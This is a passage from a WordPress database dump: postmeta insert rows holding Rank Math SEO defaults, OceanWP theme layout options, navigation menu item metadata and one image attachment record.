:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(568,82,'rank_math_rich_snippet','article'),(569,82,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(570,82,'rank_math_snippet_article_type','Article'),(571,82,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(572,82,'rank_math_snippet_course_provider_type','Organization'),(573,82,'rank_math_snippet_event_type','Event'),(574,82,'rank_math_snippet_event_performer_type','Person'),(575,82,'rank_math_snippet_jobposting_unpublish','on'),(576,82,'rank_math_snippet_music_type','MusicGroup'),(577,82,'rank_math_snippet_product_instock','on'),(578,82,'rank_math_snippet_recipe_instruction_type','SingleField'),(579,82,'rank_math_snippet_review_worst_rating','1'),(580,82,'rank_math_snippet_review_best_rating','5'),(581,82,'rank_math_snippet_review_location','bottom'),(582,82,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(583,82,'rank_math_facebook_enable_image_overlay','off'),(584,82,'rank_math_facebook_image_overlay','play'),(585,82,'rank_math_twitter_use_facebook','on'),(586,82,'rank_math_twitter_card_type','summary_large_image'),(587,82,'rank_math_twitter_enable_image_overlay','off'),(588,82,'rank_math_twitter_image_overlay','play'),(589,82,'ocean_sidebar','0'),(590,82,'ocean_second_sidebar','0'),(591,82,'ocean_disable_margins','enable'),(592,82,'ocean_display_top_bar','default'),(593,82,'ocean_display_header','default'),(594,82,'ocean_center_header_left_menu','0'),(595,82,'ocean_custom_header_template','0'),(596,82,'ocean_header_custom_menu','0'),(597,82,'ocean_menu_typo_font_family','0'),(598,82,'ocean_disable_title','default'),(599,82,'ocean_disable_heading','default'),(600,82,'ocean_disable_breadcrumbs','default'),(601,82,'ocean_display_footer_widgets','default'),(602,82,'ocean_display_footer_bottom','default'),(603,82,'ocean_custom_footer_template','0'),(604,84,'_edit_lock','1661425349:42'),(606,84,'_edit_last','1'),(607,84,'rank_math_internal_links_processed','1'),(608,84,'rank_math_seo_score','0'),(609,84,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(610,84,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(611,84,'rank_math_rich_snippet','article'),(612,84,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(613,84,'rank_math_snippet_article_type','Article'),(614,84,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(615,84,'rank_math_snippet_course_provider_type','Organization'),(616,84,'rank_math_snippet_event_type','Event'),(617,84,'rank_math_snippet_event_performer_type','Person'),(618,84,'rank_math_snippet_jobposting_unpublish','on'),(619,84,'rank_math_snippet_music_type','MusicGroup'),(620,84,'rank_math_snippet_product_instock','on'),(621,84,'rank_math_snippet_recipe_instruction_type','SingleField'),(622,84,'rank_math_snippet_review_worst_rating','1'),(623,84,'rank_math_snippet_review_best_rating','5'),(624,84,'rank_math_snippet_review_location','bottom'),(625,84,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(626,84,'rank_math_facebook_enable_image_overlay','off'),(627,84,'rank_math_facebook_image_overlay','play'),(628,84,'rank_math_twitter_use_facebook','on'),(629,84,'rank_math_twitter_card_type','summary_large_image'),(630,84,'rank_math_twitter_enable_image_overlay','off'),(631,84,'rank_math_twitter_image_overlay','play'),(632,84,'ocean_sidebar','0'),(633,84,'ocean_second_sidebar','0'),(634,84,'ocean_disable_margins','enable'),(635,84,'ocean_display_top_bar','default'),(636,84,'ocean_display_header','default'),(637,84,'ocean_center_header_left_menu','0'),(638,84,'ocean_custom_header_template','0'),(639,84,'ocean_header_custom_menu','0'),(640,84,'ocean_menu_typo_font_family','0'),(641,84,'ocean_disable_title','default'),(642,84,'ocean_disable_heading','default'),(643,84,'ocean_disable_breadcrumbs','default'),(644,84,'ocean_display_footer_widgets','default'),(645,84,'ocean_display_footer_bottom','default'),(646,84,'ocean_custom_footer_template','0'),(648,87,'_edit_lock','1655205514:42'),(650,87,'_edit_last','1'),(651,87,'rank_math_internal_links_processed','1'),(652,87,'rank_math_seo_score','0'),(653,87,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(654,87,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(655,87,'rank_math_rich_snippet','article'),(656,87,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(657,87,'rank_math_snippet_article_type','Article'),(658,87,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(659,87,'rank_math_snippet_course_provider_type','Organization'),(660,87,'rank_math_snippet_event_type','Event'),(661,87,'rank_math_snippet_event_performer_type','Person'),(662,87,'rank_math_snippet_jobposting_unpublish','on'),(663,87,'rank_math_snippet_music_type','MusicGroup'),(664,87,'rank_math_snippet_product_instock','on'),(665,87,'rank_math_snippet_recipe_instruction_type','SingleField'),(666,87,'rank_math_snippet_review_worst_rating','1'),(667,87,'rank_math_snippet_review_best_rating','5'),(668,87,'rank_math_snippet_review_location','bottom'),(669,87,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(670,87,'rank_math_facebook_enable_image_overlay','off'),(671,87,'rank_math_facebook_image_overlay','play'),(672,87,'rank_math_twitter_use_facebook','on'),(673,87,'rank_math_twitter_card_type','summary_large_image'),(674,87,'rank_math_twitter_enable_image_overlay','off'),(675,87,'rank_math_twitter_image_overlay','play'),(676,87,'ocean_sidebar','0'),(677,87,'ocean_second_sidebar','0'),(678,87,'ocean_disable_margins','enable'),(679,87,'ocean_display_top_bar','default'),(680,87,'ocean_display_header','default'),(681,87,'ocean_center_header_left_menu','0'),(682,87,'ocean_custom_header_template','0'),(683,87,'ocean_header_custom_menu','0'),(684,87,'ocean_menu_typo_font_family','0'),(685,87,'ocean_disable_title','default'),(686,87,'ocean_disable_heading','default'),(687,87,'ocean_disable_breadcrumbs','default'),(688,87,'ocean_display_footer_widgets','default'),(689,87,'ocean_display_footer_bottom','default'),(690,87,'ocean_custom_footer_template','0'),(691,89,'_edit_lock','1661021109:42'),(693,89,'_edit_last','1'),(694,89,'rank_math_internal_links_processed','1'),(695,89,'rank_math_seo_score','0'),(696,89,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(697,89,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(698,89,'rank_math_rich_snippet','article'),(699,89,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(700,89,'rank_math_snippet_article_type','Article'),(701,89,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(702,89,'rank_math_snippet_course_provider_type','Organization'),(703,89,'rank_math_snippet_event_type','Event'),(704,89,'rank_math_snippet_event_performer_type','Person'),(705,89,'rank_math_snippet_jobposting_unpublish','on'),(706,89,'rank_math_snippet_music_type','MusicGroup'),(707,89,'rank_math_snippet_product_instock','on'),(708,89,'rank_math_snippet_recipe_instruction_type','SingleField'),(709,89,'rank_math_snippet_review_worst_rating','1'),(710,89,'rank_math_snippet_review_best_rating','5'),(711,89,'rank_math_snippet_review_location','bottom'),(712,89,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(713,89,'rank_math_facebook_enable_image_overlay','off'),(714,89,'rank_math_facebook_image_overlay','play'),(715,89,'rank_math_twitter_use_facebook','on'),(716,89,'rank_math_twitter_card_type','summary_large_image'),(717,89,'rank_math_twitter_enable_image_overlay','off'),(718,89,'rank_math_twitter_image_overlay','play'),(719,89,'ocean_sidebar','sidebar-2'),(720,89,'ocean_second_sidebar','0'),(721,89,'ocean_disable_margins','enable'),(722,89,'ocean_display_top_bar','default'),(723,89,'ocean_display_header','default'),(724,89,'ocean_center_header_left_menu','0'),(725,89,'ocean_custom_header_template','0'),(726,89,'ocean_header_custom_menu','0'),(727,89,'ocean_menu_typo_font_family','0'),(728,89,'ocean_disable_title','default'),(729,89,'ocean_disable_heading','default'),(730,89,'ocean_disable_breadcrumbs','default'),(731,89,'ocean_display_footer_widgets','default'),(732,89,'ocean_display_footer_bottom','default'),(733,89,'ocean_custom_footer_template','0'),(734,91,'_edit_lock','1629382008:43'),(736,91,'_edit_last','38'),(737,91,'rank_math_internal_links_processed','1'),(738,91,'rank_math_seo_score','1'),(739,91,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(740,91,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(741,91,'rank_math_rich_snippet','article'),(742,91,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(743,91,'rank_math_snippet_article_type','Article'),(744,91,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(745,91,'rank_math_snippet_course_provider_type','Organization'),(746,91,'rank_math_snippet_event_type','Event'),(747,91,'rank_math_snippet_event_performer_type','Person'),(748,91,'rank_math_snippet_jobposting_unpublish','on'),(749,91,'rank_math_snippet_music_type','MusicGroup'),(750,91,'rank_math_snippet_product_instock','on'),(751,91,'rank_math_snippet_recipe_instruction_type','SingleField'),(752,91,'rank_math_snippet_review_worst_rating','1'),(753,91,'rank_math_snippet_review_best_rating','5'),(754,91,'rank_math_snippet_review_location','bottom'),(755,91,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(756,91,'rank_math_facebook_enable_image_overlay','off'),(757,91,'rank_math_facebook_image_overlay','play'),(758,91,'rank_math_twitter_use_facebook','on'),(759,91,'rank_math_twitter_card_type','summary_large_image'),(760,91,'rank_math_twitter_enable_image_overlay','off'),(761,91,'rank_math_twitter_image_overlay','play'),(762,91,'ocean_sidebar','0'),(763,91,'ocean_second_sidebar','0'),(764,91,'ocean_disable_margins','enable'),(765,91,'ocean_display_top_bar','default'),(766,91,'ocean_display_header','default'),(767,91,'ocean_center_header_left_menu','0'),(768,91,'ocean_custom_header_template','0'),(769,91,'ocean_header_custom_menu','0'),(770,91,'ocean_menu_typo_font_family','0'),(771,91,'ocean_disable_title','default'),(772,91,'ocean_disable_heading','default'),(773,91,'ocean_disable_breadcrumbs','default'),(774,91,'ocean_display_footer_widgets','default'),(775,91,'ocean_display_footer_bottom','default'),(776,91,'ocean_custom_footer_template','0'),(950,102,'_edit_lock','1575403094:1'),(952,102,'_edit_last','1'),(953,102,'rank_math_internal_links_processed','1'),(954,102,'rank_math_seo_score','5'),(955,102,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(956,102,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(957,102,'rank_math_rich_snippet','article'),(958,102,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(959,102,'rank_math_snippet_article_type','Article'),(960,102,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(961,102,'rank_math_snippet_course_provider_type','Organization'),(962,102,'rank_math_snippet_event_type','Event'),(963,102,'rank_math_snippet_event_performer_type','Person'),(964,102,'rank_math_snippet_jobposting_unpublish','on'),(965,102,'rank_math_snippet_music_type','MusicGroup'),(966,102,'rank_math_snippet_product_instock','on'),(967,102,'rank_math_snippet_recipe_instruction_type','SingleField'),(968,102,'rank_math_snippet_review_worst_rating','1'),(969,102,'rank_math_snippet_review_best_rating','5'),(970,102,'rank_math_snippet_review_location','bottom'),(971,102,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(972,102,'rank_math_facebook_enable_image_overlay','off'),(973,102,'rank_math_facebook_image_overlay','play'),(974,102,'rank_math_twitter_use_facebook','on'),(975,102,'rank_math_twitter_card_type','summary_large_image'),(976,102,'rank_math_twitter_enable_image_overlay','off'),(977,102,'rank_math_twitter_image_overlay','play'),(978,102,'ocean_sidebar','0'),(979,102,'ocean_second_sidebar','0'),(980,102,'ocean_disable_margins','enable'),(981,102,'ocean_display_top_bar','default'),(982,102,'ocean_display_header','default'),(983,102,'ocean_center_header_left_menu','0'),(984,102,'ocean_custom_header_template','0'),(985,102,'ocean_header_custom_menu','0'),(986,102,'ocean_menu_typo_font_family','0'),(987,102,'ocean_disable_title','default'),(988,102,'ocean_disable_heading','default'),(989,102,'ocean_disable_breadcrumbs','default'),(990,102,'ocean_display_footer_widgets','default'),(991,102,'ocean_display_footer_bottom','default'),(992,102,'ocean_custom_footer_template','0'),(1036,106,'_edit_lock','1573196623:1'),(1037,106,'_elementor_controls_usage','a:0:{}'),(1038,106,'_edit_last','1'),(1039,106,'rank_math_internal_links_processed','1'),(1040,106,'rank_math_seo_score','0'),(1041,106,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(1042,106,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(1043,106,'rank_math_rich_snippet','article'),(1044,106,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(1045,106,'rank_math_snippet_article_type','Article'),(1046,106,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(1047,106,'rank_math_snippet_course_provider_type','Organization'),(1048,106,'rank_math_snippet_event_type','Event'),(1049,106,'rank_math_snippet_event_performer_type','Person'),(1050,106,'rank_math_snippet_jobposting_unpublish','on'),(1051,106,'rank_math_snippet_music_type','MusicGroup'),(1052,106,'rank_math_snippet_product_instock','on'),(1053,106,'rank_math_snippet_recipe_instruction_type','SingleField'),(1054,106,'rank_math_snippet_review_worst_rating','1'),(1055,106,'rank_math_snippet_review_best_rating','5'),(1056,106,'rank_math_snippet_review_location','bottom'),(1057,106,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(1058,106,'rank_math_facebook_enable_image_overlay','off'),(1059,106,'rank_math_facebook_image_overlay','play'),(1060,106,'rank_math_twitter_use_facebook','on'),(1061,106,'rank_math_twitter_card_type','summary_large_image'),(1062,106,'rank_math_twitter_enable_image_overlay','off'),(1063,106,'rank_math_twitter_image_overlay','play'),(1064,106,'ocean_sidebar','0'),(1065,106,'ocean_second_sidebar','0'),(1066,106,'ocean_disable_margins','enable'),(1067,106,'ocean_display_top_bar','default'),(1068,106,'ocean_display_header','default'),(1069,106,'ocean_center_header_left_menu','0'),(1070,106,'ocean_custom_header_template','0'),(1071,106,'ocean_header_custom_menu','0'),(1072,106,'ocean_menu_typo_font_family','0'),(1073,106,'ocean_disable_title','default'),(1074,106,'ocean_disable_heading','default'),(1075,106,'ocean_disable_breadcrumbs','default'),(1076,106,'ocean_display_footer_widgets','default'),(1077,106,'ocean_display_footer_bottom','default'),(1078,106,'ocean_custom_footer_template','0'),(1079,108,'_edit_lock','1614170813:42'),(1080,108,'_elementor_controls_usage','a:0:{}'),(1081,108,'_edit_last','40'),(1082,108,'rank_math_internal_links_processed','1'),(1083,108,'rank_math_seo_score','0'),(1084,108,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(1085,108,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(1086,108,'rank_math_rich_snippet','article'),(1087,108,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(1088,108,'rank_math_snippet_article_type','Article'),(1089,108,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(1090,108,'rank_math_snippet_course_provider_type','Organization'),(1091,108,'rank_math_snippet_event_type','Event'),(1092,108,'rank_math_snippet_event_performer_type','Person'),(1093,108,'rank_math_snippet_jobposting_unpublish','on'),(1094,108,'rank_math_snippet_music_type','MusicGroup'),(1095,108,'rank_math_snippet_product_instock','on'),(1096,108,'rank_math_snippet_recipe_instruction_type','SingleField'),(1097,108,'rank_math_snippet_review_worst_rating','1'),(1098,108,'rank_math_snippet_review_best_rating','5'),(1099,108,'rank_math_snippet_review_location','bottom'),(1100,108,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(1101,108,'rank_math_facebook_enable_image_overlay','off'),(1102,108,'rank_math_facebook_image_overlay','play'),(1103,108,'rank_math_twitter_use_facebook','on'),(1104,108,'rank_math_twitter_card_type','summary_large_image'),(1105,108,'rank_math_twitter_enable_image_overlay','off'),(1106,108,'rank_math_twitter_image_overlay','play'),(1107,108,'ocean_sidebar','0'),(1108,108,'ocean_second_sidebar','0'),(1109,108,'ocean_disable_margins','enable'),(1110,108,'ocean_display_top_bar','default'),(1111,108,'ocean_display_header','default'),(1112,108,'ocean_center_header_left_menu','0'),(1113,108,'ocean_custom_header_template','0'),(1114,108,'ocean_header_custom_menu','0'),(1115,108,'ocean_menu_typo_font_family','0'),(1116,108,'ocean_disable_title','default'),(1117,108,'ocean_disable_heading','default'),(1118,108,'ocean_disable_breadcrumbs','default'),(1119,108,'ocean_display_footer_widgets','default'),(1120,108,'ocean_display_footer_bottom','default'),(1121,108,'ocean_custom_footer_template','0'),(1122,110,'_edit_lock','1615999842:42'),(1123,110,'_elementor_controls_usage','a:0:{}'),(1124,110,'_edit_last','1'),(1125,110,'rank_math_internal_links_processed','1'),(1126,110,'rank_math_seo_score','0'),(1127,110,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(1128,110,'rank_math_advanced_robots','a:3:{s:11:\"max-snippet\";s:2:\"-1\";s:17:\"max-video-preview\";s:2:\"-1\";s:17:\"max-image-preview\";s:5:\"large\";}'),(1129,110,'rank_math_rich_snippet','article'),(1130,110,'rank_math_snippet_shortcode','[rank_math_rich_snippet]'),(1131,110,'rank_math_snippet_article_type','Article'),(1132,110,'rank_math_snippet_book_editions','a:1:{i:0;a:1:{s:11:\"book_format\";s:9:\"Hardcover\";}}'),(1133,110,'rank_math_snippet_course_provider_type','Organization'),(1134,110,'rank_math_snippet_event_type','Event'),(1135,110,'rank_math_snippet_event_performer_type','Person'),(1136,110,'rank_math_snippet_jobposting_unpublish','on'),(1137,110,'rank_math_snippet_music_type','MusicGroup'),(1138,110,'rank_math_snippet_product_instock','on'),(1139,110,'rank_math_snippet_recipe_instruction_type','SingleField'),(1140,110,'rank_math_snippet_review_worst_rating','1'),(1141,110,'rank_math_snippet_review_best_rating','5'),(1142,110,'rank_math_snippet_review_location','bottom'),(1143,110,'rank_math_snippet_review_shortcode','[rank_math_review_snippet]'),(1144,110,'rank_math_facebook_enable_image_overlay','off'),(1145,110,'rank_math_facebook_image_overlay','play'),(1146,110,'rank_math_twitter_use_facebook','on'),(1147,110,'rank_math_twitter_card_type','summary_large_image'),(1148,110,'rank_math_twitter_enable_image_overlay','off'),(1149,110,'rank_math_twitter_image_overlay','play'),(1150,110,'ocean_sidebar','0'),(1151,110,'ocean_second_sidebar','0'),(1152,110,'ocean_disable_margins','enable'),(1153,110,'ocean_display_top_bar','default'),(1154,110,'ocean_display_header','default'),(1155,110,'ocean_center_header_left_menu','0'),(1156,110,'ocean_custom_header_template','0'),(1157,110,'ocean_header_custom_menu','0'),(1158,110,'ocean_menu_typo_font_family','0'),(1159,110,'ocean_disable_title','default'),(1160,110,'ocean_disable_heading','default'),(1161,110,'ocean_disable_breadcrumbs','default'),(1162,110,'ocean_display_footer_widgets','default'),(1163,110,'ocean_display_footer_bottom','default'),(1164,110,'ocean_custom_footer_template','0'),(1185,114,'_menu_item_type','post_type'),(1186,114,'_menu_item_menu_item_parent','0'),(1187,114,'_menu_item_object_id','68'),(1188,114,'_menu_item_object','page'),(1189,114,'_menu_item_target',''),(1190,114,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1191,114,'_menu_item_xfn',''),(1192,114,'_menu_item_url',''),(1194,114,'_menu_item_template',''),(1195,114,'_menu_item_mega_template','0'),(1196,114,'_menu_item_nolink',''),(1197,114,'_menu_item_category_post',''),(1198,114,'_menu_item_megamenu',''),(1199,114,'_menu_item_megamenu_auto_width',''),(1200,114,'_menu_item_megamenu_col',''),(1201,114,'_menu_item_megamenu_heading',''),(1202,114,'_menu_item_megamenu_widgetarea','0'),(1203,114,'_menu_item_icon',''),(1204,115,'_menu_item_type','post_type'),(1205,115,'_menu_item_menu_item_parent','129'),(1206,115,'_menu_item_object_id','82'),(1207,115,'_menu_item_object','page'),(1208,115,'_menu_item_target',''),(1209,115,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1210,115,'_menu_item_xfn',''),(1211,115,'_menu_item_url',''),(1213,115,'_menu_item_template',''),(1214,115,'_menu_item_mega_template','0'),(1215,115,'_menu_item_nolink',''),(1216,115,'_menu_item_category_post',''),(1217,115,'_menu_item_megamenu',''),(1218,115,'_menu_item_megamenu_auto_width',''),(1219,115,'_menu_item_megamenu_col',''),(1220,115,'_menu_item_megamenu_heading',''),(1221,115,'_menu_item_megamenu_widgetarea','0'),(1222,115,'_menu_item_icon',''),(1223,116,'_menu_item_type','post_type'),(1224,116,'_menu_item_menu_item_parent','0'),(1225,116,'_menu_item_object_id','80'),(1226,116,'_menu_item_object','page'),(1227,116,'_menu_item_target',''),(1228,116,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1229,116,'_menu_item_xfn',''),(1230,116,'_menu_item_url',''),(1232,116,'_menu_item_template',''),(1233,116,'_menu_item_mega_template','0'),(1234,116,'_menu_item_nolink',''),(1235,116,'_menu_item_category_post',''),(1236,116,'_menu_item_megamenu',''),(1237,116,'_menu_item_megamenu_auto_width',''),(1238,116,'_menu_item_megamenu_col',''),(1239,116,'_menu_item_megamenu_heading',''),(1240,116,'_menu_item_megamenu_widgetarea','0'),(1241,116,'_menu_item_icon',''),(1242,117,'_menu_item_type','post_type'),(1243,117,'_menu_item_menu_item_parent','127'),(1244,117,'_menu_item_object_id','87'),(1245,117,'_menu_item_object','page'),(1246,117,'_menu_item_target',''),(1247,117,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1248,117,'_menu_item_xfn',''),(1249,117,'_menu_item_url',''),(1251,117,'_menu_item_template',''),(1252,117,'_menu_item_mega_template','0'),(1253,117,'_menu_item_nolink',''),(1254,117,'_menu_item_category_post',''),(1255,117,'_menu_item_megamenu',''),(1256,117,'_menu_item_megamenu_auto_width',''),(1257,117,'_menu_item_megamenu_col',''),(1258,117,'_menu_item_megamenu_heading',''),(1259,117,'_menu_item_megamenu_widgetarea','0'),(1260,117,'_menu_item_icon',''),(1261,118,'_menu_item_type','post_type'),(1262,118,'_menu_item_menu_item_parent','0'),(1263,118,'_menu_item_object_id','76'),(1264,118,'_menu_item_object','page'),(1265,118,'_menu_item_target',''),(1266,118,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1267,118,'_menu_item_xfn',''),(1268,118,'_menu_item_url',''),(1270,118,'_menu_item_template',''),(1271,118,'_menu_item_mega_template','0'),(1272,118,'_menu_item_nolink',''),(1273,118,'_menu_item_category_post',''),(1274,118,'_menu_item_megamenu',''),(1275,118,'_menu_item_megamenu_auto_width',''),(1276,118,'_menu_item_megamenu_col',''),(1277,118,'_menu_item_megamenu_heading',''),(1278,118,'_menu_item_megamenu_widgetarea','0'),(1279,118,'_menu_item_icon',''),(1299,120,'_menu_item_type','post_type'),(1300,120,'_menu_item_menu_item_parent','127'),(1301,120,'_menu_item_object_id','91'),(1302,120,'_menu_item_object','page'),(1303,120,'_menu_item_target',''),(1304,120,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1305,120,'_menu_item_xfn',''),(1306,120,'_menu_item_url',''),(1308,120,'_menu_item_template',''),(1309,120,'_menu_item_mega_template','0'),(1310,120,'_menu_item_nolink',''),(1311,120,'_menu_item_category_post',''),(1312,120,'_menu_item_megamenu',''),(1313,120,'_menu_item_megamenu_auto_width',''),(1314,120,'_menu_item_megamenu_col',''),(1315,120,'_menu_item_megamenu_heading',''),(1316,120,'_menu_item_megamenu_widgetarea','0'),(1317,120,'_menu_item_icon',''),(1356,123,'_menu_item_type','post_type'),(1357,123,'_menu_item_menu_item_parent','127'),(1358,123,'_menu_item_object_id','89'),(1359,123,'_menu_item_object','page'),(1360,123,'_menu_item_target',''),(1361,123,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1362,123,'_menu_item_xfn',''),(1363,123,'_menu_item_url',''),(1365,123,'_menu_item_template',''),(1366,123,'_menu_item_mega_template','0'),(1367,123,'_menu_item_nolink',''),(1368,123,'_menu_item_category_post',''),(1369,123,'_menu_item_megamenu',''),(1370,123,'_menu_item_megamenu_auto_width',''),(1371,123,'_menu_item_megamenu_col',''),(1372,123,'_menu_item_megamenu_heading',''),(1373,123,'_menu_item_megamenu_widgetarea','0'),(1374,123,'_menu_item_icon',''),(1375,124,'_menu_item_type','post_type'),(1376,124,'_menu_item_menu_item_parent','129'),(1377,124,'_menu_item_object_id','108'),(1378,124,'_menu_item_object','page'),(1379,124,'_menu_item_target',''),(1380,124,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1381,124,'_menu_item_xfn',''),(1382,124,'_menu_item_url',''),(1384,124,'_menu_item_template',''),(1385,124,'_menu_item_mega_template','0'),(1386,124,'_menu_item_nolink',''),(1387,124,'_menu_item_category_post',''),(1388,124,'_menu_item_megamenu',''),(1389,124,'_menu_item_megamenu_auto_width',''),(1390,124,'_menu_item_megamenu_col',''),(1391,124,'_menu_item_megamenu_heading',''),(1392,124,'_menu_item_megamenu_widgetarea','0'),(1393,124,'_menu_item_icon',''),(1394,125,'_menu_item_type','post_type'),(1395,125,'_menu_item_menu_item_parent','127'),(1396,125,'_menu_item_object_id','84'),(1397,125,'_menu_item_object','page'),(1398,125,'_menu_item_target',''),(1399,125,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1400,125,'_menu_item_xfn',''),(1401,125,'_menu_item_url',''),(1403,125,'_menu_item_template',''),(1404,125,'_menu_item_mega_template','0'),(1405,125,'_menu_item_nolink',''),(1406,125,'_menu_item_category_post',''),(1407,125,'_menu_item_megamenu',''),(1408,125,'_menu_item_megamenu_auto_width',''),(1409,125,'_menu_item_megamenu_col',''),(1410,125,'_menu_item_megamenu_heading',''),(1411,125,'_menu_item_megamenu_widgetarea','0'),(1412,125,'_menu_item_icon',''),(1413,126,'_menu_item_type','post_type'),(1414,126,'_menu_item_menu_item_parent','129'),(1415,126,'_menu_item_object_id','72'),(1416,126,'_menu_item_object','page'),(1417,126,'_menu_item_target',''),(1418,126,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1419,126,'_menu_item_xfn',''),(1420,126,'_menu_item_url',''),(1422,126,'_menu_item_template',''),(1423,126,'_menu_item_mega_template','0'),(1424,126,'_menu_item_nolink',''),(1425,126,'_menu_item_category_post',''),(1426,126,'_menu_item_megamenu',''),(1427,126,'_menu_item_megamenu_auto_width',''),(1428,126,'_menu_item_megamenu_col',''),(1429,126,'_menu_item_megamenu_heading',''),(1430,126,'_menu_item_megamenu_widgetarea','0'),(1431,126,'_menu_item_icon',''),(1432,127,'_menu_item_type','custom'),(1433,127,'_menu_item_menu_item_parent','0'),(1434,127,'_menu_item_object_id','127'),(1435,127,'_menu_item_object','custom'),(1436,127,'_menu_item_target',''),(1437,127,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1438,127,'_menu_item_xfn',''),(1439,127,'_menu_item_url',''),(1441,127,'_menu_item_template',''),(1442,127,'_menu_item_mega_template','0'),(1443,127,'_menu_item_nolink','nolink'),(1444,127,'_menu_item_category_post',''),(1445,127,'_menu_item_megamenu',''),(1446,127,'_menu_item_megamenu_auto_width',''),(1447,127,'_menu_item_megamenu_col',''),(1448,127,'_menu_item_megamenu_heading',''),(1449,127,'_menu_item_megamenu_widgetarea','0'),(1450,127,'_menu_item_icon',''),(1470,129,'_menu_item_type','custom'),(1471,129,'_menu_item_menu_item_parent','0'),(1472,129,'_menu_item_object_id','129'),(1473,129,'_menu_item_object','custom'),(1474,129,'_menu_item_target',''),(1475,129,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1476,129,'_menu_item_xfn',''),(1477,129,'_menu_item_url',''),(1479,129,'_menu_item_template',''),(1480,129,'_menu_item_mega_template','0'),(1481,129,'_menu_item_nolink','nolink'),(1482,129,'_menu_item_category_post',''),(1483,129,'_menu_item_megamenu',''),(1484,129,'_menu_item_megamenu_auto_width',''),(1485,129,'_menu_item_megamenu_col',''),(1486,129,'_menu_item_megamenu_heading',''),(1487,129,'_menu_item_megamenu_widgetarea','0'),(1488,129,'_menu_item_icon',''),(1490,127,'_elementor_controls_usage','a:0:{}'),(1491,125,'_elementor_controls_usage','a:0:{}'),(1492,117,'_elementor_controls_usage','a:0:{}'),(1493,123,'_elementor_controls_usage','a:0:{}'),(1494,120,'_elementor_controls_usage','a:0:{}'),(1497,129,'_elementor_controls_usage','a:0:{}'),(1498,115,'_elementor_controls_usage','a:0:{}'),(1499,124,'_elementor_controls_usage','a:0:{}'),(1501,126,'_elementor_controls_usage','a:0:{}'),(1503,114,'_elementor_controls_usage','a:0:{}'),(1504,118,'_elementor_controls_usage','a:0:{}'),(1505,116,'_elementor_controls_usage','a:0:{}'),(1585,68,'rank_math_permalink','about'),(2093,258,'_wp_attached_file','2019/11/home_4.jpg'),(2094,258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:565;s:4:\"file\";s:18:\"2019